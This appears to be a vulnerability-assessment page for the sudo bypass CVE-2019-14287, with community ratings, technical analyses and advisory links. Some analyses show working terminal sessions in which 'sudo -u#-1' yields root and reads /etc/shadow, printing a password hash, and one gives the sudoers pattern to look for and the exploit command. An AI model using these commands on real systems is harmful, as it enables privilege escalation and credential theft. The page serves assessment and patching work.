Attacker Value
Low
(5 users assessed)
Exploitability
Very High
(5 users assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
1

CVE-2019-14287

Disclosure Date: October 17, 2019
Add any MITRE ATT&CK Tactics to the list below that apply to this CVE.

Description

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.

Add Assessment

5
Ratings
Technical Analysis

Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

I’ve seen Runas specifications on exactly two servers in the wild. I think it’s even rarer that you would specify ALL and !root in the same specification, though it is a better application of the principle of least privilege.

More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.

Here’s a contrived example of the bug in action:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: /usr/bin/whoami
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami
ubuntu
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$

You must specify # to use a UID.

Here’s another example where you’re not limited to a command, only the target users:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: ALL
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow
root:*:17897:0:99999:7:::
daemon:*:17897:0:99999:7:::
bin:*:17897:0:99999:7:::
sys:*:17897:0:99999:7:::
sync:*:17897:0:99999:7:::
games:*:17897:0:99999:7:::
man:*:17897:0:99999:7:::
lp:*:17897:0:99999:7:::
mail:*:17897:0:99999:7:::
news:*:17897:0:99999:7:::
uucp:*:17897:0:99999:7:::
proxy:*:17897:0:99999:7:::
www-data:*:17897:0:99999:7:::
backup:*:17897:0:99999:7:::
list:*:17897:0:99999:7:::
irc:*:17897:0:99999:7:::
gnats:*:17897:0:99999:7:::
nobody:*:17897:0:99999:7:::
systemd-timesync:*:17897:0:99999:7:::
systemd-network:*:17897:0:99999:7:::
systemd-resolve:*:17897:0:99999:7:::
systemd-bus-proxy:*:17897:0:99999:7:::
syslog:*:17897:0:99999:7:::
_apt:*:17897:0:99999:7:::
lxd:*:17897:0:99999:7:::
messagebus:*:17897:0:99999:7:::
uuidd:*:17897:0:99999:7:::
dnsmasq:*:17897:0:99999:7:::
sshd:*:17897:0:99999:7:::
pollinate:*:17897:0:99999:7:::
vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7:::
ubuntu:!:18100:0:99999:7:::
vagrant@ubuntu-xenial:~$
3
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Patch, but don’t freak out.

2
Ratings
Technical Analysis

As many others before me have stated, this CVE hold very little use other than in CTF environments.

To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:

<user> ALL=(ALL:!root) NOPASSWD: ALL

If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:

sudo -u#-1 <command>

You can also use the unsigned equivalent of -1: 4294967295.

To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .

General Information

References

https://nvd.nist.gov/vuln/detail/CVE-2019-14287
http://www.openwall.com/lists/oss-security/2019/10/14/1
https://usn.ubuntu.com/4154-1/
https://www.debian.org/security/2019/dsa-4543
https://seclists.org/bugtraq/2019/Oct/21
https://seclists.org/bugtraq/2019/Oct/20
http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IP7SIOAVLSKJGMTIULX52VQUPTVSC43U/
https://www.sudo.ws/alerts/minus_1_uid.html
http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
https://security.netapp.com/advisory/ntap-20191017-0003/
https://www.openwall.com/lists/oss-security/2019/10/15/2
https://lists.debian.org/debian-lts-announce/2019/10/msg00022.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TUVAOZBYUHZS56A5FQSCDVGXT7PW7FL2/
https://support.f5.com/csp/article/K53746212?utm_source=f5support&amp;utm_medium=RSS
http://www.openwall.com/lists/oss-security/2019/10/24/1
https://access.redhat.com/errata/RHSA-2019:3197
https://access.redhat.com/errata/RHSA-2019:3205
https://access.redhat.com/errata/RHSA-2019:3204
https://access.redhat.com/errata/RHSA-2019:3209
https://access.redhat.com/errata/RHSA-2019:3219
http://www.openwall.com/lists/oss-security/2019/10/29/3
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPLAM57TPJQGKQMNG6RHFBLACD6K356N/
https://access.redhat.com/errata/RHSA-2019:3278
https://resources.whitesourcesoftware.com/blog-whitesource/new-vulnerability-in-sudo-cve-2019-14287
https://access.redhat.com/errata/RHSA-2019:3694
https://access.redhat.com/errata/RHSA-2019:3755
https://access.redhat.com/errata/RHSA-2019:3754
https://access.redhat.com/errata/RHSA-2019:3895
https://access.redhat.com/errata/RHSA-2019:3916
https://access.redhat.com/errata/RHBA-2019:3248
https://access.redhat.com/errata/RHSA-2019:3941
https://access.redhat.com/errata/RHSA-2019:4191
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbns03976en_us
https://access.redhat.com/errata/RHSA-2020:0388
https://security.gentoo.org/glsa/202003-12

Additional Info

Technical Analysis